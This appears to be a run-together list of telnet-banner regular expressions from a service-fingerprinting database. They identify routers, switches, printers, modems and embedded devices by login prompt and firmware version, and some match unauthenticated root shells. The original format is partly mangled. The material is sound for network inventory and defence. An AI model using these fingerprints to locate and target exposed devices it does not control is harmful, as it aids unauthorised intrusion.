\*\x1b\[2;1H +\xff\xfb\x01\n\r\n.*Bay Networks (Bay[-.: \w]+)\n\r +Check Point FireWall-1 authenticated Telnet server running on +\xff\xfb\x01\r\n\rType \"\?\" at the command prompt for a list of commands\.\n\r.*Command-> +\xff\xfb\x01\x1b\[0m\x1b\[2J\x1b\[0m\x1b\[9;20HCopyright\(C\) 1995-99 D-Link Systems Inc\.\x1b\[13;30HUser Name\x1b\[14;30HPassword\x1b\[23;10HMAC Address:\x1b\[8;29H([-.\w]+) Console Program\x1b\[13;41H +\xff\xfa\x18\x01\xff\xf0\xff\xfb\x01\xff\xfb\x03Ambit Cable Router\r\n\r\nLogin: +\n\rVina Technologies (.*) \((\d[-.\w]+ build \d+)\) +\xff\xfd\x03\xff\xfb\x03\xff\xfb\x01\x1b\[0m\x1b\[1;1H\x1b\[2J\rD\r \n\r (DES-.*) Command Line Interface\n\r\n +\xff\xfb\x01\xff\xfb\x03\xff\xfc\x1f\n\r\n\rUser Access Verification\n\r\n\r\n\r\n\r\n\rShell version (\d\S+).*Maipu Communication Technology Co\. +\xff\xfb\x01\xff\xfb\x03\xff\xfd\x03\x1b.*Intel Corporation, ([-+. \w()]+) +\r\nFlowPoint/(.*) Ready\r\n.*\xff\xfb\x01\xff\xfb +Tenor Multipath Switch CDR Server\r\nConnected from IpAddr/Port# [\d.]+/\d+ to Port# \d+\r\nPassword: +\xff\xfb\x01\xff\xfb\x03\xff\xfd\x01\x0d\x0a\x0d\x0aCisco\x20Systems.*Console/Telnet Access of the ([-. \w]+) for Configuration Purposes +\xff\xfb\x01\n\r\x08\x08\x08\x08\x08\x08\x08\x08\x08\x08\x08\x08\x08\x08\x08\x08\x08\x08\x08\x08\x08\x08\x08\x08\x08\x08\x08 \x08\x08\x08\x08\x08\x08\x08\x08\x08\x08\x08\x08\x08\x08\x08 +\r\n\r\nUser Access Verification\r\nPassword:\xff\xfb\x01 +\xff\xfb\x03\xff\xfb\x01\xff\xfb\x03\xff\xfb\x01.*\r\nUser Access Verification\r\n\r\nPassword: +\xff\xfb\x01\r\r\nUser Access Verification\r\r\n\r\r\nUsername: +\xff\xfb\x01\xff\xfb\x03\xff\xfd\x01\r\n\r\nCisco Systems Console\r\n +\xff\xfd\x18 +\xff\xfd\x18\xff\xfd\x1f\xff\xfd#\xff\xfd'\xff\xfd\ +\xff\xfb\x01\n\rUser Name : +\xff\xfd\ +\xff\xfb\x01\xff\xfb\x03\xff\xfe\x01\n\rlogin: +\xff\xfb\x03\xff\xfb\x01\xff\xfd\x1f\r\n\r\nUsername: +\xff\xfd\x18\xff\xfd \xff\xfd#\xff\xfd'\xff\xfd\| p|Openwall GNU/*/Linux telnetd +\xff\xfc\x01\r\nHP JetDirect\r\n\r\nPlease type \"\?\" for HELP, or \"/\" for current settings\r\n> +\xff\xfb\x01\xff\xfb\x03\r\nAXIS (\S+) TELNET +\xff\xfb\x01\xff\xfb\x03\xff\xfd\x03.*?FORE\x20Systems,\x20FORE\x20ES-2810.*?Version (\d[\d\.-]+) +\xff\xfb\x03\xff\xfb\x01.*ForeRunner ES-3810.*Enter Username: +\xff\xfb\x01\r\nCopyright \(C\) 1999 by Extreme Networks\r\r\n +\xff\xfb\x01\xff\xfd\x03\xff\xfb\x03.*?ES-1000\x20Fast\x20Ethernet\x20Switch\x20Console +\xff\xfb\x01\xff\xfd\x01\xff\xfb\x03\xff\xfd\x03\xff\xfb\x05\xff\xfd\x05Welcome to ([-\w_]+) Debug Terminal - \d*\n\r\n\r\n\rlogin: +\x1b\[0m\x1b\[2J\x1b\[01;28HCONEXANT SYSTEMS, INC\.\x1b\[02;19H ACCESS RUNNER ADSL CONSOLE PORT\x1b\[24;01H>>>\x1b\[24;01HLOGON PASSWORD>\x1b\[02;53H3\.\d+\x1b\[24;17H\x1b\[24;17H\x1b\[24;17H\x1b\[24;17H +\xff\xfb\x01\xff\xfb\x03\xff\xfd\x18\xff\xfd\x1f\r\n\r\nWelcome on (.*)\r\n\r\n\r\nUsername: +\xff\xfb\x01\xff\xfd\x18\nTelnet Service on the PrintServer\n\n\rPassword: | p|Hawking/TRENDnet Print Server telnetd +\xff\xfb\x01\xff\xfb\x03\r\n\r\n Welcome to OpenVMS \(TM\) Alpha Operating System, Version V([\d.]+) \r\n\r\n\rUsername: +\xff\xfb\x01\xff\xfb\x03\xff\xfd\x03\xff\xfd\x18\xff\xfd\x1f\xff\xfd \xff\xfd!\x07\r\n\r\n Welcome to OpenVMS \(TM\) Alpha Operating System, Version V([-\w_.]+) \r\n\r\n\rUsername: +\xff\xfd\(| p|IBM OS/390 or SNA telnetd +\xff\xfb\r\nRemotelyAnywhere Telnet Server v([\d.]+)\r\n.*\r\n\r\n([-\w_. ]+) login\r\nuser name: +\xff\xfb\x01\xff\xfb\x03\xff\xfd\x03\xff\xfd\x1f\xff\xfd\x18([^\r\n]+)\r\nRemotelyAnywhere Telnet Server ([\d.]+)\r\n.*\r\n\r\n([-\w_. ]+) login\r\nuser name: +\r\nVxWorks login: \xff\xfb\x01 +\xff\xfb\x01\xff\xfd\x01\xff\xfb\x03\xff\xfd\x03\xff\xfb\x01\xff\xfd\x01\xff\xfb\x03\xff\xfd\x03\r\n\r\nSelect Access Level\r\n===================\r\n1 - Read-Only\r\n2 - Installer\r\n3 - Administrator\r\n13008 >>> +\xff\xfb\x01\xff\xfb\x03\xff\xfd\x18\xff\xfd\x1f\r\nExterior router [-\w_.]+\r\nType: Cisco 2651\r\nModule: E3/T3 interface\r\n\r\n +\xff\xfe\x01\xff\xfb\x01\xff\xfd\x03\xff\xfb\x03\xff\xfd\x18Georgia SoftWorks Telnet Server for Windows NT/2000/XP/2003/Vista Ver\. ([-\w_.]+)\n\r +\xff\xfb\x01\xff\xfb\x03\xff\xfd\x01\r\n\r\nCisco Systems, Inc\. Console\r\n\r\n\r\n\r\r\n\r\nUsername: +\xff\xfb\x01\xff\xfb\x03\r\n\r\n\[ORiNOCO-AP-(\d+)[-\d]*\]> Please enter password: +\xff\xfb\xfd\xff\xfb\x01\n\r\n\rFabric OS \(tm\) Release v([\w.]+)\n\r\n\r +\xff\xfb\x01\xff\xfb\x03\xff\xfd\x18\r\n\nLantronix MSS100 Version V([\d.]+)/\d+\(\d+\)\n\r\nType HELP at the 'Local_2> ' prompt for assistance\.\n\r\n\r\n\nUsername> +\xff\xfb\x01\xff\xfb\x03\xff\xfd\x18\r\0\r\0\r\n\x07# \0 +\xff\xfb\x01OPTIBASE MGW5100 COMMAND LINE INTERFACE\r\n +PC Telnetd ([\d.]+)\r\n\r\nlogin: +rsconfig: port rose not active\n\xff\xfd\"\r\nLinuxNode v([\d.]+) \(([-\w_.]+)\)\r\n\r\nlogin: +\xff\xfd\"\r\nLinuxNode v([\d.]+) \(([-\w_.]+)\)\r\n\r\nlogin: +\xff\xfd\x01\xff\xfd!\xff\xfb\x01\xff\xfb\x03\r\r\n\r\n\r\nBusyBox v([-\w_.]+) \([^)]+\) Built-in shell \(ash\)\r\nEnter 'help' for a list of built-in commands\.\r\n\r\n# +\xff\xfd\x01\xff\xfd\x1f\xff\xfd!\xff\xfb\x01\xff\xfb\x03\r\n\r\nBusyBox v([-\w_.]+) \([^)]+\) Built-in shell \(ash\)\r\nEnter 'help' for a list of built-in commands\.\r\n\r\n/bin # +\xff\xfd\x01\xff\xfd\x1f\xff\xfd!\xff\xfb\x01\xff\xfb\x03\r\n\r\nBusyBox v([-\w_.]+) \([^)]+\) built-in shell \(ash\)\r\nEnter 'help' for a list of built-in commands\.\r\n\r\nermittle die aktuelle TTY\r\ntty is \"/dev/pts/0\"\r\nConsole Ausgaben auf dieses Terminal umgelenkt\r\n# +\xff\xfd\x01\xff\xfd!\xff\xfb\x01\xff\xfb\x03\r\n\r\nBusyBox v([-\w_.]+) \(2006\.02\.15-21:18\+0000\) Built-in shell \(msh\)\r\nEnter 'help' for a list of built-in commands\.\r\n\r\n# +\xff\xfb\x01\xff\xfb\x03\xff\xfd\x18\xff\xfd\x1f\r\nRouter> +\xff\xfd\x01\xff\xfd!\xff\xfb\x01\xff\xfb\x03\r\nAmiNET\d+ login: +\xff\xfb\x03\xff\xfb\x01\r\n\r\n\x07HP (\w+) Ethernet SNMP Module\r\n ROM B\.([\d.]+)\r\n EEPROM A\.([\d.]+)\r\n HW B\.([\d.]+)\r\n\r\nEnter password: +USR5450 Telnet server v([\d.]+)\n\r\nPassword : +\xff\xfd\x03\xff\xfb\x03\xff\xfd\x01\xff\xfb\x01\d\d-\w+-\d+ \d\d:\d\d:\d\d %MSCM-I-NEWTERM: New TELNET connection from (?:[\d.]+)\r\r\nPassword: +\xff\xfb\x01\xff\xfb\x03\xff\xfd\x18\r\0\n\nLantronix ETS16 Version V([\d.]+)/\d+\(\d+\)\n\r\0\nType HELP at the 'BRTR-ETS16>' prompt for assistance\.\n\r\0\nUsername> +\r\nWelcome to slush\. \(Version ([\d.]+)\)\r\n\r\n\r\n\xff\xfb\x01\xff\xfb\x03([-\w_. ]+) login: +\xff\xfb\x01\xff\xfd\x03\xff\xfb\x03\x1b\[0m\x1b\[2J\x1b\[0m\x1b\[2J\x1b\[2;66H\x1b\[1m\x1b\[21;1H\x1b\[0m-+\x1b\[22;2H\x1b\[0mFunction:\x1b\[23;2H\x1b\[0mMessage:\x1b\[24;2H\x1b\[7mCTRL\+R = Refresh +\x1b\[8;12H\x1b\[0mIBM BladeCenter 4-Port Gb Ethernet Switch Module Console +\xff\xfb\x01\xff\xfe\x01\xff\xfd\x03\xff\xfb\x03\x1b\[0;1H\x1b\[J\x1b\[1;1H\x1b\[0;1H\x1b\[J\x1b\[1;1H\x1b\[0m =+\r\n AT-8326GB Management System Version ([\d.]+) \r\n Remote - Telnet\r\n +\r\nEfficient 5851 SDSL \[ATM\] Router \(5851-\d+\) v([-\d.]+) Ready\r\n\xff\xfb\x01\xff\xfb\x03\xff\xfd\x01\xff\xfe\x01Login: +NPC Telnet permit one connection\.\r\n But One connection\(\) already keep alive\.\r\nGood Bye !! \r\n +\xff\xfb\x01\r\nWelcome to NetLinx v([\d.]+) Copyright AMX Corp\. \d+-\d+\r\n> +\r\nSiemens \d+ T1E1 \[COMBO\] Router \(([-\d]+)\) v([\d.]+) Ready\r\n\xff\xfb\x01\xff\xfb\x03\xff\xfd\x01\xff\xfe\x01Username: +\xff\xfd\x18\xff\xfb\x01\x1b\[2J\x1b\[\?7l\x1b\[4;23r\x1b\[\?6l\x1b\[1;1H\x1b\[\?25l\x1b\[1;1HCopyright \(C\) 1991-1994 Hewlett-Packard Co\. All Rights Reserved\. +\xff\xfc\x01\xff\xfb\x01\xff\xfb\x03\xff\xfd\x18\xff\xfb\x18\xff\xfd\x1f\xff\xfb\x1f\xff\xfb\"\xff\xfb\x05\r\nCLI access not allowed until the SCC is active\.\r\n\r\n +\xff\xfb\x01\n?\r\n\r?VxWorks login: +\xff\xfb\x03\xff\xfb\x01\xff\xfd\x1f\r\nVxWorks login: +\xff\xfb\x01\r\n\rPassword: | p|ZyXEL Prestige/Efficient Speedstream adsl router telnetd +\xff\xfb\x03\xff\xfb\x01password: +\r\n\xff\xfb\x01Enter password: +\xff\xfd\x01\xff\xfd!\xff\xfb\x01\xff\xfb\x03\r\r\n\w+ login: +\xff\xfb\x01\xff\xfb\x03\r\n\(\w+\) \r\nUser: +login: \xff\xfb\x01\xff\xfb\x03| p|USRobotics/Sagem router telnetd +\xff\xfb\x01\xff\xfb\x03\xff\xfb\0\xff\xfd\0login: +220 FTP server \(ver 1\.0\) ready\.\r\n +\xff\xfd\x01\xff\xfd!\xff\xfb\x01\xff\xfb\x03\r\nBusyBox on dslmodem login: +\xff\xfb\x01\xff\xfd\x03\xff\xfb\x03\xff\xfd\x1f\xff\xfd\x18 +\xff\xfd\x01\xff\xfd!\xff\xfb\x01\xff\xfb\x03\r\nlogin: +\r\nSystem unavailable\. Please try later\.\r\n +\xff\xfd\x01\xff\xfd\x1f\xff\xfd!\xff\xfb\x01\xff\xfb\x03\r\r\n\r\n(FVS\w+) login: +\xff\xfb\0\xff\xfd\0\xff\xfb\x01\xff\xfd\x01\xff\xfb\x03\xff\xfd\x03Login Name: +\xff\xfb\x01\xff\xfe\"\r\n\* +\xff\xfb\x03\xff\xfb\x01\r\n Disconnecting\.\.\.\r\n\n +\xff\xfb\x01\xff\xfb\x03\x1b\[2J\x1b\[0;0H\x1b\[K\x1b\[7mTelnet configuration RELEASE ([\d.]+)\x1b +Telnet server disabled\r\n +\xff\xfd\x01\xff\xfd\x1f\xff\xfd!\xff\xfb\x01\xff\xfb\x03\r\r\n login: +\xff\xfd\x01\xff\xfd\x1f\xff\xfb\x01\xff\xfb\x03\r\r\n([\w._-]+) login: +\xff\xfd\x01\xff\xfd\x1f\xff\xfb\x01\xff\xfb\x03([\w._-]+) login: +\r\n.*Based\(loosely\) on CircleMUD ([\d.]+) +\r\n.*Based on CircleMUD ([\w._-]+),\r\n +\x1b\[0;37;40m\x1b\[2J\x1b\[0;37;40m\x1b\[1m\x1b\[15;22HAT-(\w+), version ([\d.]+)\x1b +\xff\xfb\x01\xff\xfe\x01\xff\xfd\x03\xff\xfb\x03\x1b\[0;0H\x1b\[0J\x1b\[0;0H\x1b\[0J\x1b\[1;28HAT-([-\w_.]+) Login Menu\x1b\[5;18HAT-[-\w_.]+ Local Management System Version ([\d.]+) \x1b +\xff\xfd\x03\xff\xfb\x01\x1b\[2J\x1b\[1;1H\x1b\[0m\x1b\[\?3l\x1b\(0\x1b\[2;40H\x1b\(B\x1b\(0\x1b\[2;28H\x1b\(BCSX([-\w_.]+) Local Management\x1b\[0m\x1b\(0\x1b\[5;24H\x1b\(BCABLETRON Systems, Incorporated\x1b +\xff\xfb\x01\n\rno data rcvd for version string\n\rrecv version id unsuccessful\n\rSSH Session task 0x\w+: Version Exchange Failed\n\r +\r\nSorry, this system is engaged\.\r\n +\xff\xfd\x01\xff\xfd!\xff\xfb\x01\xff\xfb\x03\r\nBusyBox on \(none\) login: +\xff\xfd\x01\xff\xfd!\xff\xfb\x01\xff\xfb\x03\r\nBusyBox on ([-\w_.]+) login: +\xff\xfd\x01\xff\xfd!\xff\xfb\x01\xff\xfb\x03\r\n\r\nBusyBox v([-\w_.]+) \( +\xff\xfd\x01\xff\xfd\x1f\xff\xfd!\xff\xfb\x01\xff\xfb\x03\r\r\n\r\n\r\nBusyBox v(.*) Built-in shell \(ash\)\r\n +\xff\xfd\x01\xff\xfd!\xff\xfb\x01\xff\xfb\x03\(none\) login: +\xff\xfb\x01Hummingbird Communications Ltd\., Windows NT, Telnetd Version ([\d.]+) \(([-\w_.]+)\)\r\n\r\n login: +\xff\xfb\x01\xff\xfb\x03\r\nUser Access Verification\r\n\r\nPlease Enter Login Name: +\xff\xfb\x01\xff\xfb\x03\r\nUser Access Verification\r\n\r\nPlease Enter Password: +\xff\xfb\x01\xff\xfb\x03BR-telnet@FI_Core> +\xff\xfd\x01\xff\xfd!\xff\xfb\x01\xff\xfb\x03\r\r\n\x1b\[\?3l\x1b\[2JPlease enter your user name and password!! \r\n\r\nLogin: +\xff\xfb\x01\r\nD-Link Access Point login: +\xff\xfd\x01\xff\xfd!\xff\xfb\x01\xff\xfb\x03.*\r\n([-\w_.]+) login: +\xff\xfd\x01\xff\xfd\x1f\xff\xfd!\xff\xfb\x01\xff\xfb\x03Login failed\.\r\n +\xff\xfb\x01\xff\xfb\x03\xff\xfd\x18\r\nPON 262194 PAAMCO (TA \w+) Gen3\r\n\n\n\ruser: +\xff\xfd\x03\xff\xfb\x03\xff\xfd\x01\xff\xfb\x01\r\n\r\r\nUser Name: +\xff\xfb\x01\xff\xfd\x03\xff\xfb\x03\n\r +\*+\n\r +Welcome to ([-\w_.]+)\n\r +\*+\n\r\n\rD-Link Corp\., Inc\. Software Release ([-\w_.)(/]+)\n\rCopyright \(c\) \d+-\d+ by D-Link Corp\., Inc\.\n\r\n\rlogin: +\xff\xfb\x03\xff\xfb\x01\xff\xfd\x1f\r\nUsing telnet exposes your password\. Using ssh is a safer choice\.\r\n\r\nUsername: +\xff\xfb\x03\xff\xfb\x01\xff\xfb\x03\xff\xfb\x01\r\n\r\nPIX passwd: +\xff\xfb\x01\r\n#-+\r\n# Tasman Networks Inc\. Telnet Login\r\n# +\xff\xfd\x03\xff\xfb\x01\r\n\r\n\t\tWelcome to P333R\r\n\t\tSW version ([\d.]+)\r\n\r\n\r\nLogin: +\xff\xfd\x01\xff\xfd\x1f\xff\xfd!\xff\xfb\x01\xff\xfb\x03\r\r\nPLi dm7000 Helenite \d+ \(based on [-\w_.]+\)\r\n\rwelcome on your dreambox! - Kernel ([-\w_.]+) +\xff\xfd\x01\xff\xfd\x1f\xff\xfd!\xff\xfb\x01\xff\xfb\x03\r\r\n\r\n\r[ *\r\n]*Welcome on your dreambox! - Kernel (\d[\w.]+) +\xff\xfe\"\xff\xfb\x01 \x1b\[H\x1b\[J\x1b\[3;1HCB-1000 S/N: (\d+)\x1b\[3;56HSymbol Technologies, Inc\.\x1b\[4;1HVersion ([-\w_.]+)\x1b\[4;44HEthernet HW address ([\w:]+)\x1b\[21;1H +\x1b\[\?25l\xff\xfb\x01\x1b\[2J\x1b\[0m\x1b\[1;1H\x1b\[2;1H\x1b\[3;1H\x1b\[4;1H ### ### ########### ########## ############# ########### ###\x1b\[5;1H #### ### ############# ############ ############# ########### ###\x1b\[6;1H[ #]{70}\x1b\[7;1H[ #]{70}\x1b\[8;1H[ #]{70}\x1b\[9;1H[ #]{70}\x1b\[10;1H[ #]{70}\x1b\[11;1H[ #]{70}\x1b\[12;1H[ #]{78}\x1b\[13;1H[ #]{78}\x1b\[14;1H\x1b\[15;1H\x1b\[16;1HEnter Ctrl-Y to begin\.\x1b\[18;3H\*{35} +\xff\xfb\x01\x1b\[2J\x1b\[0m\x1b\[1;1H \*\*\*\*\* \*\*\* \* \* \*\*\*\*\* \*\*\*\*\*\*\*\*\* \*\*\* +\xff\xfb\x03\xff\xfb\x01\r\n\r\n\*+\r\n\* Welcome to D-Link Wireless Print Server \*\r\n\* +Telnet Console +\*\r\n\*+\r\n\r\nServer Name : ([\w._-]+)\0+\r\nServer Model : ([\w._+-]+)\0+\r\nF/W Version : ([\w._-]+)\0.\0+\r\nMAC Address : ([\w ]+) +\xff\xfb\x01\xff\xfb\x03\r\n\r\n\x1b\[H\x1b\[JWelcome at ActiveFax Server\.\r\n\r\n +\xff\xfb\x01\xff\xfb\x03RemoteX Telnet Server V([\d.]+)\n\r\n\rc:\\> +\xff\xfb\x01\xff\xfd\x03\xff\xfb\x03\n\r +\*+\n\r +Welcome to ZXDSL 831\n\r +\*+\n\r\n\rZTE Corporation, Software Release VIK-([-\w_.]+)\n\r +\*{60}\r\n\r\nThis session allows you to set the TCPIP parameters for your\r\nDell Laser Printer Printer Dell (\w+) MFP Ethernet internal network device, with a hardware\r\naddress of ([0-9A-F:]{17}) \(MSB, Canonical\)\.\r\nIt's an ethernet card\.\r\nNetwork Firmware Version is V([\w._-]+)\(\w+ MFP\) ([\d-]+)\.\r\nSystem Up Time is ([^\r\n.]+)\.\r\n\r\n +\xff\xfb\"\xff\xfb\x03\xff\xfb\x01\xff\xfb\0\xff\xfd\0\n\r\nWelcome to the PDP-10 simulator\r\n\n +\xff\xfb\x01\(Enable\) Password\? +\xff\xfb\x01\xff\xfb\x03\xff\xfd\x18\r\n\r\nCGX3224 Switch Manager Console\. Version: CGX([\d.]+) Bld (\d+),.*\r\n\r\nPassword: +\xff\xfb\x01\xff\xfd\x03\xff\xfb\x03\x1b\[0m\x1b\[2J\x1b\[01;00H\r\n\r\0\r\n\r\0[ \t]+\r\n\r\0\r\n\r\0\r\0VersaXpress HPNA Routing Concentrator\r\n +\xff\xfd\x01\xff\xfd\x1f\xff\xfd!\xff\xfb\x01\xff\xfb\x03\r\r\nSportster Pro ([\d.]+) Image Sagem D-BOX2 - Kernel ([-\w_.]+) +\xff\xfb\x01\xff\xfb\x03\r\0\n\*\*\* Lantronix Universal Device Server \*\*\*\r\0\nSerial Number (\d+) MAC address ([\w:]+)\n\r\0Software version 0*([\d.]+) \((\d+)\)\r\0\n\r\0\nPress Enter to go into Setup Mode \r\0\n +\xff\xfd\x01\xff\xfd\x1f\xff\xfd!\xff\xfb\x01\xff\xfb\x03Fritz!Box web password: +\xff\xfd\x01\xff\xfd\x1f\xff\xfd!\xff\xfb\x01\xff\xfb\x03\r\r\nFritz!Box web password: +\xff\xfd\x01\xff\xfd\x1f\xff\xfd!\xff\xfb\x01\xff\xfb\x03\r\r\nDD-WRT v([-\w_+. ]+) Date: +\xff\xfd\x01\xff\xfd\x1f\xff\xfd!\xff\xfb\x01\xff\xfb\x03\r\r\nDD-WRT v([^\r\n]+)\r\n +\xff\xfd\x01\xff\xfd\x1f\xff\xfd!\xff\xfb\x01\xff\xfb\x03DD-WRT (v\d+)[^\r\n]*\r\nRelease: ([^\r\n]+)\r\n\xff\r\ngateway login: +\xff\xfd\x18\xff\xfd \xff\xfd#\xff\xfd\x1f\xff\xfd'\xff\xfd\ +\xff\xfb\x03\xff\xfb\x01\r\n\r\nU\.S\. Robotics\r\nTotal Control \(tm\) NETServer 8/16\r\n\r\nlogin: | p|USRobotics TotalControl NetServer 8/16 telnetd +\xff\xfb\x01\r\n\r\n\*\*\* ADTRAN TSU ESP \*\*\*\r\n\r\n ENTER PASSWORD -> \xff\xfd\x03\xff\xfb\x03 +\xff\xfb\x01\xff\xfb\x03\xff\xfd\x18\r\n\nLantronix (SCS\d+) Version V([\d/().]+)\n\r\nType HELP +\xff\xfb\x03\xff\xfb\x01\r\n\r\nPassword : +\xff\xfb\x01\xff\xfb\x01\xff\xfb\x01\xff\xfb\x03\xff\xfd\x18\xff\xfd\x1f\r\n\*+\r\n\* Copyright\(c\) 1998-2006 Huawei Technologies Co\., Ltd\. All rights reserved\. \*\r\n +\xff\xfb\x01\xff\xfb\x03\xff\xfd\x03\r\n\r\n\r\nWelcome to X2301 version V\.([-\w_+. ()]+) IPSec from [\d/]+ [\d:]+\r\nsystemname is ([-\w_.]+), +\xff\xfb\x01\xff\xfd\x03\xff\xfb\x03\n\r *\**\n\r *Welcome to Viking II\. \n\r *\**\n\r\n\rGlobespanVirata Inc\., Software Release VIK-([-\w_.]+)\n\r +\xff\xfb\x01\xff\xfe\x01\xff\xfd\x03\xff\xfb\x03\x1b\[1;1H\x1b\[J\x1b\[22;0H>\x1b\[1K\x1b\[999D\r\0login: +\x1b\[2J\x1b\[1;1fATOS Telnet Server\r\n\r\nCTRL\+d to exit\n\r\n\xff\xfb\x01\xff\xfb\x03\xff\xfd\x03Init Command Line Interface\.\. \r\nBoot Version: [\d.]+\r\nBoot Date: [\d :/]+\r\nATOS Version: ([\d.]+) \([^)]+\)\r\nATOS Date: [\d :/]+\r\nHardware: \w+\r\nProduct Code : \d+\r\nSerial Number : (\d+)\r\nLAN0 MAC Address : ([A-F0-9:]+)\r\nADSL Modem SW version: [\w._-]+ *\r\nADSL Modem API version: \d+\r\nADSL Driver version: [\w._-]+\r\n([\w._-]+) release: ([\w._-]+)+\r\nHW encryption not supported\r\nVinetic fw version : [\w._-]+\r\n\r\nUser name : +\xff\xfb\x01\xff\xfe\x01\n\r\n\r\n\r\n\n\n\n\r\t=+\n\r\t +Samsung SWL-6100AP Configuration\n\r\t +\xff\xfb\x01\xff\xfb\x03\r\0\nMAC address (\w+)\n\r\0Software version ([\w._-]+ \(\d+\)) XPTEXE\r\0\n\n\r\0Press Enter to go into Setup Mode \n\r\0 +\xff\xfd\x01\xff\xfd!\xff\xfb\x01\xff\xfb\x03USR ADSL Gateway\r\nLogin: +\xff\xfb\x03\xff\xfb\x01\r\nService Processor login: +\xff\xfd\x01\xff\xfd!\xff\xfb\x01\xff\xfb\x03ADSL2\+ Wireless Router (\w+) \r\nSoftware Version: ([\w.]+)\r\nLogin name: +\xff\xfb\x01Symbol Access Point User/Admin password: +\xff\xfb\x01\xff\xfb\x03\xff\xfd\x03\xff\xfb\x05\xff\xfd\x18\xff\xfd\x1f\xff\xfd \xff\xfd!\xff\xfe\"\xff\xfc\"Username Access Verification\r\n\r\nLogin : +\xff\xfb\x01\xff\xfd\x01\xff\xfb\x03\xff\xfd\x03\xff\xfb\x05\xff\xfd\x05Welcome to Telnet Server ([\w._-]+)\r\n\x1b\[0m\x1b\[2J\x1b\[05;28H(SM\w+) Managed Switch\x1b\[07;22H\x7fTallahasseeAdmin-Block\x1b\[15;30Husername:\x1b\[17;30Hpassword:\x1b\[15;39H +\r\n\r\nPassword required, but none set\r\n +\xff\xfb\x01\xff\xfb\x03\xff\xfd\x03\xff\xfd\x18\xff\xfd\x1fWelcome to your TiVo\r\n\r\n=\[tivo:root\]-# +\xff\xfa\x18\x01\xff\xf0\xff\xfb\x01\xff\xfb\x03AMBIT Cable Modem\r\n\r\nlogin: +refused in\.telnetd from [-\w_.]+ logged\n +\xff\xfd\x01\xff\xfd\x1f\xff\xfd!\xff\xfb\x01\xff\xfb\x03Access DENIED\.\r\n +\xff\xfb\x01\x1b\[1;1H\x1b\[2K\x1b\[2;1H\x1b\[2K\x1b\[3;1H\x1b\[2K\x1b\[4;1H\x1b\[2K\x1b\[5;1H\x1b\[2K\x1b\[6;.*Business Policy Switch 2000 +BeanShell ([-\w_.]+) - by Pat Niemeyer \(pat@pat\.net\)\nbsh % +\xff\xfb\x01\xff\xfd\x03\xff\xfb\x03\xff\xfd\x1f\r\n\(Aruba800\) \r\nUser: +\xff\xfb\x01\x1b\[1;1H\x1b\[2K\x1b\[2;1H\x1b\[2K\x1b\[3;1H\x1b\[2K\x1b\[4;1H\x1b\[2K\x1b\[5;1H\x1b\[2K\x1b\[6;1H\x1b.*BayStack 420 +\xff\xfd\x03\xff\xfb\x01\xff\xfb\x03SHARP (MX-\w+) Ver ([-\w_.]+) TELNET server\. +\xff\xfb\x01\xff\xfb\x03Welcome to (DCS-\w+) telnet daemon\r\n\r\nPassword: +\xff\xfb\x01\r\nVoIP Phone V([-\w_.]+) settings\r\nPassword: +\xff\xfb\x01\r\nAIRAYA login: +\xff.\x01\0?\xff\xfd.*Welcome to ViewStation.*Password: +AD6680 Gateway Software\r\n[-\w_]+ \(MAC ([\w:]+)\)\r\n +\xff\xfb\x01\xff\xfd\x03\xff\xfb\x03\r\nHP ProLiant BL p-Class C-GbE2 Interconnect Switch A\.\r\n +\xff\xfd\x01\xff\xfd!\xff\xfb\x01\xff\xfb\x03Netgear DM111 ADSL2\+ Modem \r\nSoftware Version: ([-\w_.]+)\r\nLogin name: +\xff\xfb\x03\xff\xfb\x01\r\n\r\n\*+\r\n\* Welcome to Print Server \*\r\n\* +Telnet Console +\*\r\n\*+\r\n\r\nServer Name : ([\w._-]+)\0\0\0\0\0\0\r\nServer Model : 2U1P Print Server\0+\r\nF/W Version : ([\w._-]+).*\r\nMAC Address : ([\w ]+) +\xff\xfb\x03\xff\xfd\x03\xff\xfb\x01\r\n\r\nMMC Technology Telnet\r\nMW-3000AP \w+\( Combo ([-\w_.]+) \)\r\n\r\n +\xff\xfb\x01\xff\xfd\x03\xff\xfb\x03\n\r.*\n\r\n\rSoftware Release R([-\w_.]+)\([^)]+\)\n\rCopyright \(c\) 2001-2003 by D-Link, Inc\.\n\r\n\rlogin: +\xff\xfb\x03\xff\xfb\x01\r\nWelcome to the WhatRoute TELNET Server\.\r\n +\xff\xfd\x01\xff\xfd\x1f\xff\xfd!\xff\xfb\x01\xff\xfb\x03\r\nCNU-550pro login: +\xff\xfd\x01\xff\xfd\x1f\xff\xfd!\xff\xfb\x01\xff\xfb\x03picotux login: +\xff\xfb\x03\xff\xfd\x18\xff\xfb\x01\xff\xfd\x1f\xff\xfd!\r\nCadant C3 CMTS\r\n +\r\n\(c\) Copyright 2005, Extron Electronics, IPL T S2, V([\d.]+), +\xff\xfb\x01\xff\xfb\x03\r\n.*HM410dp ADSL2\+ Router\r\n\r\nLogin: +\xff\xfd\x03\xff\xfb\x01\xff\xfb\x03NS-30G Ver ([-\w_.]+) TELNET server\.\r\0\nCopyright \(c\) \d+ KYOCERA +\xff\xfb\x01\xff\xfb\x03\xff\xfd\x03\r\n\r\n\r\nWelcome to X4100 version V\.([-\w_.]+) Rev\. (\d+) \(Patch (\d+)\) from [\d/]+ [\d:]+\r\nsystemname is ([-\w_.]+), +\xff\xfe\x01\xff\xfd!\xff\xfb\x01\xff\xfb\x03login: +\xff\xfb\x03\xff\xfb\x01\r\nZyXEL Corporation Embedded Telnet Server \(c\) 2000-2003\r\n +\xff\xfb\x01\xff\xfb\x03\*\*\* Lantronix UDS1100 Device Server \*\*\*\r\0\nMAC address (\w+)\n\r\0Software version V([\w._-]+) \((\d+)\) \r\0\nPassword : +\xff\xfb\x01\xff\xfb\x01\xff\xfb\x01\xff\xfb\x03\xff\xfd\x18\xff\xfd\x1f\r\n\*+\r\n\* Copyright\(c\) 2004-2006 3Com Corp\. and its licensors\. +\xff\xfd\x03\xff\xfb\x01\r\n\r\nProduct type: Avaya (\w+) Media Gateway Release ([\w._-]+)\r\n\r\n\r\n\r\nLogin: +\xff\xfd\x01\xff\xfd\x1f\xff\xfd!\xff\xfb\x01\xff\xfb\x03\r\r\nPLi dm500 Jade \d+ \(based on ([\w._-]+)\)\r\n\rwelcome on your dreambox! - Kernel ([\w._-]+) \([\d:]+\)\.\r\n\rdm500 login: +\r\nSorry, this system is engaged by a rlogin session\.\r\nHost IP address: ([\d.]+)\.\nLogin name: ([\w._-]+)\.\n +\xff\xfb\x03\xff\xfb\x01\xff\xfb\x03\xff\xfb\x01.*\r\n\r\nUser Access Verification\r\n\r\nUsername: +Connected\r\nUse log command to LOGON\r\n 